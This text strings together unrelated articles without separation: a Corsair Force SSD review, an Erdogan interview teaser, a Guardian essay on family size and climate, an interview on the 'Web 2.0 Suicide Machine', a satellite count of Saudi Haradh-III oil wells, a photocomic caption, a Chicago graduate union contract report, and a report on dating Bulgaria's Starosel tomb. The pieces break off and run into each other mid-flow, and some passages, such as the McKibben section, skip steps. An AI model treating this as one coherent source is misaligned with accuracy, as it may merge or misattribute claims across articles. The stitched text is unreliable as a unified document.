Not interested in making the same mistake twice , Corsair took the same risk as many other SSD makers and got in bed with a little company called SandForce .
Widely believed to be the creator of the technology behind Seagate ’s first SSD , SandForce has been popping up all over the place lately .
We first encountered the company late last year with a preview of OCZ ’s Vertex 2 Pro. SandForce 's technology seemed promising .
The problem of maintaining SSD performance is a lot like keeping a room tidy and clean .
If you make sure to put things in the right place the first time and do n’t let dirt accumulate , you ’ll end up with an organized , pristine looking room .
However if you just throw your stuff around and let stains go untouched , you ’ll spend a lot more time looking for things and probably end up ruining the place .
The same holds true for SSDs .
If the controller does n’t properly place data it ’ll take longer to place new data .
And if the controller does n’t properly wear level , you ’ll end up reducing the life of the drive .
I ’ve explained the how behind all of this countless times before , so I ’ll spare you the details here .
Needless to say , it ’s a juggling act .
One that requires a fast enough controller , a large amount of fast storage ( whether it is on - die cache or off - chip DRAM ) and a good algorithm for managing all the data that gets thrown at it .
At a high level Crucial / Micron , Indilinx and Intel take a relatively similar approach to the problem .
They do the best with the data they ’re given .
Some do better than others , but they ultimately take the data you write to the drive and try to make the best decisions as to where to put it .
SandForce takes a different approach .
Instead of worrying about where to place a lot of data , it looks at ways to reduce the amount of data being written .
Using a combination of techniques akin to lossless data compression and data deduplication , SandForce ’s controllers attempt to write less to the NAND than their competitors .
By writing less , the amount of management and juggling you have to do goes down tremendously .
SandForce calls this its DuraWrite technology .
DuraWrite is n’t perfect .
If you write a lot of highly compressed or purely random data , the algorithms wo n’t be able to do much to reduce the amount of data you write .
For most desktop uses , this should n’t be a problem however .
Despite the obvious achilles ’ heel , SandForce ’s technology was originally designed for use in the enterprise market .
This lends credibility to the theory that SandForce was Seagate ’s partner of choice for Pulsar .
With enterprise roots , SandForce ’s controllers and firmware are designed to support larger - than - normal amounts of spare area .
As you may remember from our earlier articles , there ’s a correlation between the amount of spare area you give a dynamic controller and overall performance .
You obviously lose usable capacity , but it helps keep performance high .
SandForce indicates that eventually we ’ll see cheaper consumer drives with less NAND set aside as spare area , but for now a 128 GB SandForce drive only gives you around 93 GB of actual storage space .
Introducing the SF - 1200
The long winded recap brings us to our new friend .
The Vertex 2 Pro I previewed last year used a full fledged SF - 1500 implementation , complete with ridiculously expensive supercap on board .
SandForce indicated that the SF - 1200 would be more reasonably priced , at the expense of a performance hit .
In between the two was what we got with OCZ ’s Vertex Limited Edition .
OCZ scored a limited supply of early controllers that did n’t have the full SF - 1500 feature set , but were supposedly better than the SF - 1200 .
Today we have Corsair ’s Force drive , its new performance flagship based on the SF - 1200 .
Here ’s what SandForce lists as the differences between the SF - 1500 and SF - 1200 :
SandForce Controller Comparison SF - 1200 SF - 1500 Flash Memory Support MLC MLC or SLC Power Consumption 550 mW ( typical ) 950 mW ( typical ) Sequential Read / Write Performance ( 128KB ) 260 MB/s 260 MB/s Random Read / Write Performance ( 4K ) 30K/10 K IOPS 30K/30 K IOPS Security 128 - bit AES Data Encryption , Optional Disk Password 128 - bit AES Data Encryption , User Selectable Encryption Key Unrecoverable Read Errors
Less than 1 sector per 1016 bits read Less than 1 sector per 1017 bits read MTTF 2,000,000 operating hours 10,000,000 operating hours Reliability 5 year customer life cycle 5 year enterprise life cycle
The Mean Time To Failure numbers are absurd .
We ’re talking about the difference between 228 years and over 1100 years .
I ’d say any number that outlasts the potential mean time to failure of our current society is pretty worthless .
Both the SF - 1200 and SF - 1500 are rated for 5 year useful lifespans , the difference is that SandForce says the SF - 1200 can last for 5 years under a " customer " workload vs. an enterprise workload for the SF - 1500 .
Translation ?
The SF - 1500 can handle workloads with more random writes for longer .
The SF - 1500 also appears to be less error prone , but that ’s difficult to quantify in terms of real world reliability .
The chip sizes are identical , although the SF - 1500 draws considerably more power .
If I had to guess I ’d say the two chips are probably the same with the differences amounting to be mostly firmware , binning and perhaps fusing off some internal blocks .
Maintaining multiple die masks is an expensive task , not something a relative newcomer would want to do .
Note the lack of any external DRAM .
Writing less means tracking less , which means no external DRAM is necessary .
Regardless of the difference , the SF - 1200 is what Corsair settled on for the Force .
Designed to be a high end consumer drive , the Force carries a high end price .
Despite it ’s 100GB capacity there ’s actually 128GB of NAND on the drive , the extra is simply used as spare area for block recycling by the controller .
If we look at cost per actual GB on the drive , the Force does n’t look half bad :
SandForce Controller Comparison Drive NAND Capacity User Capacity Drive Cost Cost per GB of NAND Cost per Usable GB Corsair Force 128 GB 93.1GB $ 410 $ 3.203 $ 4.403 Corsair Nova 128 GB 119.2GB $ 369 $ 2.882 $ 3.096 Crucial RealSSD C300 256GB 238.4GB $ 680 $ 2.656 $ 2.852 Intel X25 - M G2 160 GB 149.0GB $ 489 $ 3.056 $ 3.282 OCZ Vertex LE 128 GB 93.1GB $ 394 $ 3.078 $ 4.232
But looking at cost per user addressable GB is n’t quite as pretty .
It ’s a full $ 1.12 more per GB than Intel ’s X25 - M G2 .
It 's also a bit more expensive than OCZ's Vertex LE , although things could change once Corsair starts shipping more of these drives .
SPIEGEL Interview with Turkey 's Prime Minister ' There Can be No Talk of Genocide '
In a SPIEGEL interview , Turkish Prime Minister Recep Tayyip Erdogan , 56 , discusses Ankara 's relationship with the European Union , the debate over genocide against the Armenians and his role as a mediator in the dispute over Iran 's nuclear policy .
Twelve years ago , the American author Bill ­McKibben published a short book entitled Maybe One : A Personal and Environmental Argument for Much Smaller Families .
It certainly has its faults : most obviously , it provides a little too much information about the vasectomy ­McKibben decided to have in lieu of a second child .
But it is n’t pious or hectoring ; if anything , the author tries overly hard to be tentative , emphasising that he is n’t seeking to dictate other people ’s choices , and does n’t think he has all the answers .
The “ maybe ” is right there in the title , after all .
McKibben meant it in the sense of “ maybe one child at most ” , but it reflects the book ’s general tone of modesty and equivocation .
Maybe
One is a suggestion .
It ’s something to think about .
He might as well have called for the enforced sterilisation of all men and women of procreating age , along with the outlawing of Father Christmas and the Tooth Fairy .
The New York Times called him “ sanctimonious ” and “ holier - than - thou ” .
The Wall Street Journal labelled him an “ extremist ” ( their specific objection was that he had n’t mentioned nuclear power as a way to combat global warming , even though Maybe One is a book about parenting ) .
“ So much false information , so many bad ideas , in so few pages , ” another reviewer fumed .
Speaking after publication , McKibben observed that Maybe One ’s subject matter was “ the last remaining taboo thing to talk about ” and in this case the cliché seemed justified .
In 1998 , most people were n’t willing to consider any significant lifestyle changes for environmental reasons , let alone cutting back on kids .
Much has changed since then , of course , both in terms of the consensus on the threat posed by climate change and our willingness to make sacrifices in the face of it .
But one thing has not : you still wo n’t hear any major environmental campaign group in Britain or the United States arguing that , in addition to flying less and recycling more , middle - class westerners should be having fewer children to save the planet .
Even commentators who warn of the evils of overpopulation , proudly trumpeting their willingness to raise controversial issues in defiance of “ political correctness ” , only rarely emphasise the notion that we – rather than those in the developing world – might consider doing less of the populating .
For several thorny reasons , family size has become the great unmentionable of the campaign for more environmentally friendly lifestyles .
And yet , in the end , it may be the only one that really counts .
Trying to understand the debate about population and the climate sometimes feels like peering into a kaleidoscope while drunk .
Directly contradictory claims , which ca n’t both be true at the same time , are advanced as if they were facts .
Weird allegiances are created : George Monbiot and American creationists , for example , are roughly equally contemptuous of organisations such as the Optimum Population Trust ; supporters of reproductive rights find common cause with anti-abortionists .
You come across nutty - sounding fringe groups like the Voluntary Human Extinction Movement , but then you phone its founder , Les Knight – he ’s a supply teacher , based on America ’s west coast , and can only talk during breaks between lessons – only to discover that he is n’t nutty at all , but in fact rather sane and self - deprecating .
( He simply wants people to choose not to breed .
“ Eventually we ’ll be extinct anyway , but it would be so much nicer if we phased ourselves out through natural attrition , ” Knight told me affably .
“ You know – the way a company reduces its workforce without firing anyone . ” )
For all the confusion and sensitivities that ­surround the subject , though , the basic facts are clear .
If you live in Britain or the United States in 2010 , there is nothing you can do to reduce your impact on the environment that even comes close to the effects of having one fewer child .
This makes intuitive sense : every new human is a new consumer with their own carbon footprint , along with their own potentially limitless chain of descendants .
The year before last , two researchers at Oregon State University , Paul Murtaugh and Michael Schlax , set about trying to put a figure on the idea of “ carbon legacy ” , and last summer their results were published in the journal Global Environmental Change .
Murtaugh and Schlax started from a simple premise .
Assume , they said , that if a woman and a man have a baby , they ’re each responsible for 50 % of that child ’s lifetime carbon - dioxide ( CO2 ) emissions ; and if that child has its own child , the original two parents each bear 25 % of the responsibility for their grandchild ’s emissions , and so on down the generations .
For how many tonnes , on average , would each original parent end up being responsible ?
There are two important obstacles in performing this calculation .
The first is that you do n’t know what will happen to per capita emission rates in the future : worldwide , they ’ll almost certainly rise , but in many ­western countries they ’re likely to fall , as energy - efficiency measures kick in .
The second is that you do n’t know what will happen to fertility rates : you ca n’t know whether your great - great - granddaughter will give birth to one new carbon - emitter , or two , or six , or zero .
So for fertility rates , Murtaugh and Schlax used UN population predictions .
( In the experiment , some of the hypothetical family trees eventually died out ; others were stopped after a predetermined time . )
And for per-capita emissions , they used three different scenarios : an optimistic one , in which per-capita emissions fell , a pessimistic one in which they rose , and a compromise one , in which they stayed constant .
The headline result was astonishing .
Under the constant scenario , an American who forgoes having a child would save 9,441 tonnes of CO2 – almost six times , on average , the amount of CO2 they would emit in their own lifetime , or the equivalent of making around 2,550 return airplane trips between London and New York .
If the same American drove a more fuel - efficient car , drastically reduced his or her driving , installed energy - efficient windows , used energy - efficient light bulbs , replaced a household refrigerator , and recycled all household paper , glass and metal , he or she would save fewer than 500 tonnes .
The Oregon study did n’t run the numbers for Britain , where per-capita carbon emissions are already about half as big as in the United States .
( This is n’t down to personal virtue : it ’s mainly because so many of our power stations use gas instead of coal . )
But in every other country they examined – including Japan , where per-capita emissions are similar to Britain ’s– the environmental effects of not having a child were similarly vast .
Even if every emissions target recommended by the Intergovernmental Panel on Climate Change were to be successfully implemented – the ­“ optimistic scenario ” – an American could still save 562 tonnes of CO2 by having one fewer child , while a Japanese person could save 233 tonnes .
Leaving aside the complexities of global population issues , then , would n’t it make sense for British environmental groups to suggest that well - off westerners might like to consider smaller families ?
John Sauven , the executive director of Greenpeace UK , concedes that it ’s a “ no - brainer ” that a smaller population would place a smaller burden on the planet .
But he ’s reluctant to contemplate a Greenpeace campaign ; in any case , he says , among environmentally conscious people in his demographic , “ my sense is that nearly all of us have had two children or fewer ” .
Documentary film - maker Franny Armstrong — who runs the 10:10 campaign to cut UK carbon emissions by 10 % this year , which is backed by the Guardian — says the topic came up in the planning stages of the project , but was abandoned .
“ We did have the discussion .
But we decided it could n’t work , because of the timescale .
10:10 is a short - term campaign about reductions you can make in 2010 . ”
Besides , a decade after Bill McKibben published Maybe One , we ’re apparently still not ready to contemplate its message .
“ 10:10 is a populist campaign .
It ’s about doing the easy things first , ” Armstrong says .
“ I completely agree that [ family size ] is the elephant in the room .
But we need one of the big thinkers , a George Monbiot or a Naomi Klein , to go first , before anyone else is going to say it .
To use that as a message in a populist ­campaign , right now ?
It would absolutely destroy the whole campaign . ”
The fundamental problem with the topic of influencing population levels is that almost everybody – no matter what their politics or other beliefs – has a very good reason to avoid discussing it .
If you do n’t believe in climate change , it ’s yet more irrelevant , busybodyish meddling .
If you ’re broadly left wing or progressive , as are most people strongly committed to reducing their own environmental impact , it ’s awkward , because raising the issue seems to shift responsibility from the developed countries , which bear most historical responsibility for climate damage , to the develop­ing world , where population growth is most rapid .
And for anti-immigration voices on the right , the whole idea seems backwards : they worry that Europe ’s population – by which they usually mean its white population – is n’t growing fast enough , so promot­ing smaller families is perverse .
Above all , perhaps , there ’s the simple fact that family size seems such an intensely personal matter , beyond the legitimate scope of politics or public campaigns .
Just mentioning it feels somehow inappropriate .
There ’s another awkward truth : historical predictions of catastrophic population explosions have tended to be badly wrong , from Thomas Malthus in the 1700s , to Paul Ehrlich in the 1960s , to the UN Population Fund , which predicted in 1987 that a world population of five billion would mean the world “ could degenerate into disaster ” .
( The number is now well over 6.7 billion . )
Nearly everyone , meanwhile , is troubled by the notion of coercion : China ’s “ one - child policy ” , promoted by Chinese politicians at Copenhagen as a solution to the climate crisis , has resulted in numerous reports of forced sterilisation and abortion , and rumours of infanticide .
Supporters of reproductive choice are understandably appalled .
Then again , trying to achieve a similar end by voluntary means , by making family planning more widespread , draws fury from the other side of the spectrum : “ pro-life ” campaigners , who fear a surge in abortions .
A recent study by the Optimum Population Trust ( OPT ) estimated that saving a tonne of CO2 costs only US $ 7 if the money is spent on family planning ; to achieve the same by means of solar power would cost US $ 51 .
The finding paralysed environmental organisations , especially in the United States , where even the hint of increased funding for abortion carries huge political costs .
“ I do n’t know how to say ‘ no comment ’ emphatically enough , ” David Hamilton , of the US green group the Sierra Club , told the Washington Post .
( He had reason to be reticent : the Sierra Club suffered its own encounter with the tangled politics of population in 2004 when a group of population - control advocates tried to stage a takeover .
On that occasion , just to confuse matters further , those attempting the takeover were fiercely opposed to immigration , on the ground that immigrants to the United States develop bigger carbon footprints once they arrive . )
Strictly speaking , though , none of this ought to be relevant to the parenting decisions of the average climate - conscious Briton .
Perhaps the OPT is a brave voice in the wilderness – “ Nobody else wants to put their head above the parapet , ” says Simon Ross , an OPT trustee – or perhaps , as Monbiot says , they ’re a “ congregation of no ones ” – a gaggle of post - reproductive white middle - class men trying to shift attention to the one part of the climate problem for which they ’re not responsible .
Either way , from the point of view of climate change , choosing to have one fewer child – especially if you live in a high - consumption society – remains a Very Good Thing Indeed .
And yet even that more narrowly focused topic seems to provoke a surprising degree of fury .
Two years ago , Sarah Irving , then a journalist at Ethical Consumer magazine , was one of several people featured in a Daily Mail article on couples who had taken the small - family idea to its logical conclusion , opting to have no children at all .
( The Mail article is inadvertently hilarious , so baffled are its authors by the concept of voluntary childlessness ; one woman ’s decision to have an abortion on environmental grounds is described as “ the reversal of nature ” and “ the denial of motherhood ” . )
“ There were people who went to the lengths of finding my personal email address to say things like , ‘ Why do n’t you just kill yourself ? ’ ” Irving says , even though she was specifically quoted in the article as saying she ’d never dream of telling other people whether or not to have children .
“ Generally speaking , if you ’re talking about having no children at all , you ’re still regarded as barmy or selfish .
Or you get the patronising , ‘ Oh , you know , you ’ll change your mind . ’ ”
Prejudice remains , too , against the idea of having only one child , even though McKibben ’s book is at its strongest in his tour of the research that shows no evidence that a singleton childhood is detrimental : indeed , there are some indications that only children are more sociable and intellectually capable than their peers , because families with more children have to make their time , energy and money spread further .
But the hostility to both childlessness and one - child families explains why the OPT ’s campaign targeting British people is called Stop at Two .
( The Voluntary Human Extinction Movement objects strongly : “ Rather than stop at two , we should stop at once , ” says Les Knight . )
And even the Stop at Two position caused a minor furore last year when Jonathon Porritt , the veteran environmentalist and then a UK government adviser on sustainability , told an interviewer , “ I think we will work our way towards a position that says that having more than two children is irresponsible . ”
“ This seems to be the same old thing : save the world but kill a human , ” said the pro-life campaigner Josephine Quintavalle , following her own unique brand of logic , while Ann Widdecombe , a member of parliament , labelled Porritt “ absolutely barmy ” .
It is possible that , in Britain at least , the issue will resolve itself naturally , since both no-child and one - child families are becoming much more common : a record one - fifth of all women turning 50 in Britain in 2010 have no children , while the percentage of children without siblings was 26 % in 2007 , having steadily increased from 18 % in 1972 .
More families already Stop at Two than at any other number of children .
Having three or more children is going to become more and more unusual , quite apart from more difficult to justify while claiming to care about the warming planet .
More radical visions persist , though .
Alan Weisman ‘s 2007 bestseller , The World Without Us , pictures the earth in the hypothetical weeks after humanity vanishes – as weeds and then trees start to break through the pavements and wild animals began to take up residence again in the midst of abandoned cities .
It ’s a paradisiacal vision , yet also a terrifying one , and Weisman is n’t recommending that we try to bring it about .
He reaches a slightly more modest conclusion : the world would easily heal , he argues , if each person brought a maximum of one child into it .
( This is intended as a thought - experiment and an inspiration , not a call for coercive policies . )
By 2075 , the human presence on earth would have been reduced by half .
“ At such far - more - manageable numbers … we would have the benefit of all our progress , plus the wisdom to keep our presence under control , ” Weisman writes .
“ That wisdom would come partly from losses and extinctions too late to reverse , but also from the growing joy of watching the world daily become more wonderful .
The evidence would n’t hide in statistics .
It would be outside every human ’s window , where refreshed air would fill each season with more birdsong . ”
www.guardian.co.uk/
Copyright Guardian News and Media Limited 2010
Homepage image by cafemama
" Web 2.0 Suicide Machine " is no more - at least as we have come to know it - and at least for now .
When last we checked in on the Suicide Machine back in January , it was merrily assisting soon - to - be - former members of Facebook , Twitter , MySpace and LinkedIn to automatically , speedily -- and ceremoniously -- eliminate the " friends " they had accumulated using those services .
More than 3,000 people had bid a virtual farewell to some quarter of a million accumulated acquaintances .
It was all great fun for those who've had their fill of social networking .
Facebook , however , was not amused and blocked the site .
Its lawyers also accused the scamps behind Suicide Machine -- an outfit called WORM that 's associated with Rotterdam - based medialab Moddr - of trademark and terms - of - use violations .
Facebook even demanded that WORM walk its own plank and delete the WORM Facebook account , which meant curtains for 3,000 of its closest pseudo - friends .
( 2010's 25 Geekiest 25th Anniversaries )
All in all , the heat was sufficient to get Suicide Machine to give up the ghost , or at least play dead .
The last official " suicides " on the site were recorded Feb. 16 ( although it was briefly reactivated yesterday for a curious German television journalist ) .
The past two days I 've been swapping e-mail with Gordan Savicic , billed as the Suicide Machine 's chief euthanasia officer , to get an update on where things stand and where they 're going .
Here 's some of that exchange .
Have we heard the last of Suicide Machine ?
No .
Machine will go online again for another week or so .
I am currently writing the documentation and preparing a bootable LIVE - CD , which will be downloadable on our Web site .
Once you boot up your computer with it you 'll have a local version of the Suicide Machine and obtain the whole source code .
By doing so , we want to extend the Machine by the help of open - source programmers and give our knowledge back to the community .
Any idea when the giveaway might happen ?
I hope by the end of next week !
Do you have any concern that the giveaway will incur more legal wrath from Facebook ?
Well , that could be indeed a problem , if they 'd consider our project as a circumvention tool that would fall into the DMCA jurisdiction .
Anyhow , the Suicide Machine is just a set of python scripts which automatize browser actions .
There are even Firefox - plugins which could ( theoretically ) do such things .
Our intention for releasing the code is that we really want to give our sources back to the community .
After that week - long giveaway will the current Suicide Machine site be deactivated ?
It will not be taken down , but serve as a hub for subsequent projects and services .
What have you learned from all of this ?
Giving many interviews in various media formats ;)
We were overwhelmed by all the media attention and by the amount of people who were desperately trying to kill their accounts .
It will still take some time until I can reflect upon the last two months !
Facebook lawyers re-enter stage right in 3 ... 2 ... 1 .
Funny thing , though .
When you look at a satellite photo and count the number of producer wells they ended up drilling , it adds up to quite a few more than they have been claiming -- about 60 % more .
The Haradh III development at the southern tip of the Ghawar oil field in Saudi Arabia , completed in 2006 , has been portrayed by the national oil company Saudi Aramco as the turning point in the battle between geological adversity and engineering prowess .
The poorest reservoir rock in Ghawar has succumbed to the latest in well and drilling technology .
Aided by 3D Seismic images showing fracture locations , well sites were optimized and drills were guided by remote control from Dhahran .
Smart completions were standard ( did they ever call them " dumb " completions ? ) , and something called an " iField " was set up .
Maximum - reservoir - connectivity wells ( MRCs ) were fitted with monitoring electronics and valves on individual laterals such that they could be throttled back as needed to minimize water encroachment .
Testing was done , adjustments were made as needed , and everything rolled out ahead of schedule .
Goals for individual well productivity of 10,000 barrels / day were met , and projections indicated smooth sailing for ten years or more .
Lots of glowing articles were published , and the man in charge eventually rode off in glory to solve the rest of the world 's oil production problems .
Faux Pas in the Desert
OK , so what 's the big deal ?
After all , what are a few extra wells ?
But Saudi Aramco has been rather consistent , as well as thorough , about the development details :
The Haradh III project came on stream in February 2006 , adding 300,000 B/D of Arabian light crude production capacity to Ghawar , the world ’s largest oil field .
The project ’s main significance , however , derives from the fact that it sets a milestone for smart technologies at a scale and complexity unprecedented for Saudi Aramco and , arguably , for the industry .
Haradh III might be regarded as the entry point to a new era in upstream projects and specifically into the domain of real - time reservoir management .
The project spanned a period of 21 months .
It entailed construction of a grassroots surface - facility network , integrated with a complex subsurface development program .
Maximum - reservoir - contact ( MRC ) wells , smart completions , geosteering , and i-field features provided the four main technology components .
From the table at below left , taken from the above paper , it seems that the new era features a lot more acronyms :
Figure 1 . Project specification and well layout for Haradh - III from Saudi Aramco
A key figure is the number of producers ( 32 ) .
Also interesting is that the figures of 300,000 barrel / day flow and 2 % depletion of reserves implies 5.475 billion barrels reserves in Haradh III ( of course , this oil is not really physically separate from the rest of Haradh oil ) .
The well placement map ( above right ) from the same paper shows how these wells were positioned to drain the field , aided by water injection from the periphery .
The map also indicates 32 producers and 28 injectors , but with 15 instead of the 12 observation wells ( EV / OBS ) enumerated in the table .
Against a backdrop of many international upstream projects straining to achieve their target production levels and intended plateaus , Haradh III reached its planned production capacity of 300,000 barrels per day well ahead of schedule , and the field ’s performance more than 18 months since its start - up exceeds virtually all pre-project goals .
The above article was written by Nansen Saleri , the former Reservoir Manager for Saudi Aramco .
He leveraged the success of this project to kick - start his new career as a reservoir engineering consultant .
He later authored another article on Haradh - III , with a title invoking Matt Simmons ' book " Twilight in the Desert " ( egad ! ) : Dawn in the Desert
Sounds great , and he even provided some production data :
Figure 2 . Early production data for Haradh - III from Saudi Aramco
So , how are the wells doing ?
Haradh III became the first Saudi Aramco project to be developed exclusively with MRC wells , with down - hole ICVs for flow control .
Average well - production rates were targeted to be 10,000 bpd ( which was achieved ) , compared with 3,000 bpd for Haradh I and 6,000 bpd for Haradh II .
...
The principal sub - surface challenges and their pre-project risks ( premature water breakthrough , loss of oil production , high - decline rates ) were for the most part managed .
Eighteen months after initial production on January 31 , 2006 , the field is maintaining its production capacity at 300,000 bpd , at virtually no water production , and with 100 percent active status for all its initial producers .
While we can't double check the flow measurements , we can count wells .
I took a look at the Haradh - III development project a couple years back to determine if the field was laid out they claim .
Satellite imagery from Google Earth was used to identify and count wells to check against those reported .
Unfortunately , most of the southern end of Ghawar was covered by high resolution imagery only as recent as 2004 ( i.e. prior to the Haradh III project ) .
Some 2006 low resolution imagery was available , and this plus the fortuitous location of a few wells on the eastern fringe ( where there were 2006 hi-res pictures ) gave a reasonable indication that the project was as advertised .
Another complication is the large number of gas wells present in that region , and gas and oil wells can be distinguished only at high resolution .
So a definitive assessment would have to wait .
See Satellite o'er the Desert and selected stories on The Oil Drum for more background on this and subsequent work on visually characterizing the oil fields of Saudi Arabia .
Fast Forward to 2009
Over the last two years , Google had updated the imagery for the rest of Ghawar such that everything was covered by mid-2006 imagery or later .
The southern tip , however , was still stuck in 2004 .
But late in 2009 , a handful of restricted locations across Saudi Arabia were updated with imagery only a couple months old , including pictures covering the lower two thirds of the Haradh and the northern half of the Hawiyah operational areas of Ghawar .
These pictures were taken with the new GeoEye satellite .
This imagery update was greatly appreciated , as 2006 is fading quickly into the ancient past .
Also new in Google Earth is a timeline feature which makes available the archived imagery for easy comparison with the current view .
The new imagery shows that the locations for the producer , injector , and observation wells given in the well layout map from Saudi Aramco roughly match those found in the satellite image , as shown below ( more your cursor over the image to overlay the well map ) .
The trio of closely - spaced wells towards the southern end of the well diagram correspond to three actual wells spaced about 100 meters apart north to south .
One producer is slightly displaced , as are some of the observation wells ; but overall , the rendering is fairly accurate -- after one corrects for the " squishing " of the map , something that Saudi Aramco seems to do with many of their maps ( perhaps to confuse us ) .
Figure 3 . Haradh - III wells which Saudi Aramco admits to .
Mouseover overlays Saudi Aramco well placement diagram .
Click reveals additional wells seen in Aug - Sept 2009 imagery .
However , there are many other new ( non-gas ) wells visible in the satellite images than those claimed .
Shown in the figure below ( or by clicking on the figure above ) are locations of 28 additional wells .
Based on their location , four of these are identified as injectors ( light blue placemarks ) .
Of those remaining ( green placemarks ) , two are most likely observation wells , leaving 22 possible new producers .
Two of the indicated sites do not yet have wells drilled , even though they most likely will , so a very conservative estimate is that 20 more producers have been drilled than reported by Saudi Aramco .
Figure 4 .
All visible wells which are part of the Haradh - III project ( September 2009 )
Using a variety of Ghawar well maps , I have determined the numerical identities for many of the wells .
These are indicated in the figure below .
Five of the observation wells ( nos. 3 , 27 , 28 , 41 , and 43 ) were originally vertical wells drilled prior to 1990 .
Seven additional observation wells ( 1500 - 1506 ) were drilled at the start of the Haradh - III project .
Interestingly , two of the " new " wells are actually old vertical well sites , shown as abandoned in 2004 imagery , and now presumably redrilled with horizontal sidetracks .
Further confirmation of the identity of these wells as oil producers is the observation that they are connected to the same pipeline network with feeds into the Haradh - III Gas Oil Separation Plant , as shown below with the red traces .
Figure 5 . Haradh - III oil pipeline network and identities of several wells
Note that most of the observation wells are also connected to the pipeline network , and wells 3 , 27 , and 28 are connected to the pipeline network for the Haradh - II GOSP further north .
One detail remaining to be answered is the timing ; when , since early 2006 , were the additional wells drilled ?
DigitalGlobe , one of the imagery providers for Google Earth , has mid-2006 - 2007 images covering most of Haradh , but GE has not made them available at high resolution .
However , using the low - resolution previews as overlays indicates that at least five of the new wells were present during that time .
One of these , the northernmost new ( green ) well in the above figures , was seemingly on fire .
Well Done
Shown in the interactive graphic below is the region around a new well seemingly on fire in June of 2006 .
It was probably in production , as the pipeline to the rest of the Haradh - III network is in place .
Move your cursor across the image and left click to view changes in the area from 2004 - 2009 .
All of the three producers visible were drilled or flowing at the time of the fire .
The 2004 and 2009 images are from high - resolution selections in Google Earth , while the 2006 image is a lower resolution DigitalGlobe image .
However , it is still relatively easy to identify changes between the high and low - res cases .
Most notable in 2009 is the large number of new gas wells as compared to earlier .
This is typical of all of Haradh , as drilling for gas has exceeded that for oil .
Figure 6 .
One of the added oil producer wells , spewing smoke in June 2006 .
Mouseover the dates to show 2004 and 2009 views .
Click to highlight details .
Mission Accomplished ?
With a flurry of rather glowing articles in the press as well as in technical journals , Saudi Aramco has crowned the Haradh - III project a resounding success .
These articles are so consistent in their assessment of the project that it was rather surprising to find that it has required 52 producer wells instead of the claimed 32 and also required 3 additional injectors .
A couple extra might be expected , but that so many more were needed and that this has not leaked out is somewhat shocking .
What are we to infer from this ?
Lower production from each well ( vs. the claim of 10 k b/d ) ?
More total production ( i.e. over 300 k b/d ) ?
My bet is on the former .
This certainly does n't mean that Haradh - III is n't a significant achievement , but this does suggest that the geological complexity still has n't been overwhelmed by technology .
Saudi Aramco has been scrambling since opening day in early 2006 to meet the 300,000 barrels per day production target , and as of last fall , had at least a couple more wells planned .
Finally , I will note that the latest grand achievement by Saudi Aramco , the Khurais field redevelopment , also suffers from well inflation .
When first announced , there were to be a total of 310 wells .
When finally started up , there were 420 wells .
At least they admitted it this time , although no explanation has been offered ( perhaps they have n't been asked nicely ) .
Hopefully , Google ( GeoEye ) will point its new camera at Khurais sometime soon so we may help them count wells .
To browse the well locations using Google Earth , go here .
Surviving the World A Photocomic Education by Dante Shepherd
Lesson # 592 - Lost Friends
My dad had appendicitis once .
That was a little creepy at the time .
Later on , doctors thought that the Swede had it , but turned out they were wrong and removed the appendix anyway .
The only good thing to come out of all that was that I got to name her stomach scars .
I may have insisted upon doing so .
Oh , right , the point of all this ?
The appendix is dumb .
CHICAGO — The University of Illinois - Chicago Graduate Employees Organization and the UIC administration reached an agreement regarding the GEO ’s contract late last night , April 6 .
At issue were guaranteeing tuition waivers ( a traditional benefit of employment for graduate employees ) and tuition differentials , a special tuition which is assessed in addition to regular tuition for students in certain programs .
These differentials can change from year to year with little notice , making financial planning for a student ’s education exceptionally difficult .
For example , some graduate students to pay up to $ 11,000 per year in fees , despite the fact that most GEO members make less than $ 15,000 per year .
At the subsequent mediation session , the UIC administration and the GEO came to agreements on these two core issues .
The university also agreed to other concessions that would provide more economic security for graduate employees in the form of pay raises and contributions to health care costs , according to a GEO press release .
The UIC - GEO had voted 84 % in favor of calling for a strike as early as April 6 if contract negotiations had failed .
The GEO ’s first agreement expired in August 2009 , and GEO members have been negotiating a new contract since April 2009 , including yesterday ’s marathon 13 - hour session .
The GEO held a rally April 6 morning outside where the mediation session was taking place .
Addressing the crowd , sociology and Asian American studies professor Anna Guevarra urged the university ’s bargaining team to “ produce the best possible university and not the cheapest university . ”
Although the lengthy mediation session was “ grueling , ” according to GEO bargaining team leader Sarita Heer , “ it was worth every second to know that we have successfully settled our contract without having to go on strike . ”
The next step is membership ratification of the contract , which will happen next week , the GEO said .
“ We are happy that the university valued graduate employees enough to guarantee our financial security as we teach undergraduates at UIC and complete our research , ” GEO President Charles Moss said in a statement .
The Graduate Employees Organization , AFT local 6297 , AFL - CIO , is the labor union representing more than 1,400 teaching and graduate assistants at UIC .
These assistants teach undergraduate classes , grade papers , work in offices , design websites , maintain databases , and perform other work crucial to the teaching and research missions of the university .
Check UIC - GEO site for the most recent updates : http://www.uic-geo.net/?q=news.
Photo : Rachel Hewitt / GEO
A coin found nead the Starosel tombs shows the doubleheaded labrys , the coat of arms of the family of Amatokos II .
Photo by BGNES
One of Bulgaria ’s top Ancient Thrace sites , the Starosel Tomb , has been dated to the 4th century BC after years of research .
With German help a team of archaeologists of the Bulgarian National History Museum led by Dr. Ivan Hristov has managed to estimate the timing of the construction of the largest underground temple on the Balkan Peninsula , the Starosel Tomb , located in the Hisarya Municipality , Plovdiv District .
In the summer of 2009 , the archaeological team took samples from a stake in the middle of the tomb where gifts to the Greek goddess of the hearth Hestia were laid .
The radio carbon dating analysis carried out in Heidelberg , Germany , in the laboratory of Dr. Bernd Krommer , have shown that the stake was burned in the period after 358 BC , when the temple was constructed , and the earth was heaped on top of it to form a burial mound .
The analysis of the lab research and of the events which happened at that time have given archaeologist Ivan Hristov grounds to conclude that the temple in the village of Starosel , in the so called Chetinyova Mound , and the nearby Thracian ruler ’s residence under Mount Kozi Gramadi were built during the reign of the Thracian King Amatokos II ( 359 -351 BC ) , of the Thracian Odrysian state ( 5th - 3rd century BC .
The family coat of arms of King Amatokos was a doubleheaded ax , or a labrys .
Symbols of a labrys were discovered on several items around Starosel , including Thracian coins .
Before Dr. Hristov ’s analysis , the researchers of Ancient Thrace believed that the Starosel tomb and underground temple complex were built by King Sitalces ( 445-424 BC ) , the third ruler of the Odrysian State .
The Thracian objects in the region of Starosel were also in operation during the reign of King Teres II ( 351-341 BC ) .
The archaeologists believe that the region was the power center of Ancient Thrace in the 4th century BC .
It was destroyed during the rise of the Macedonian state of Philip II in 342-341 BC .
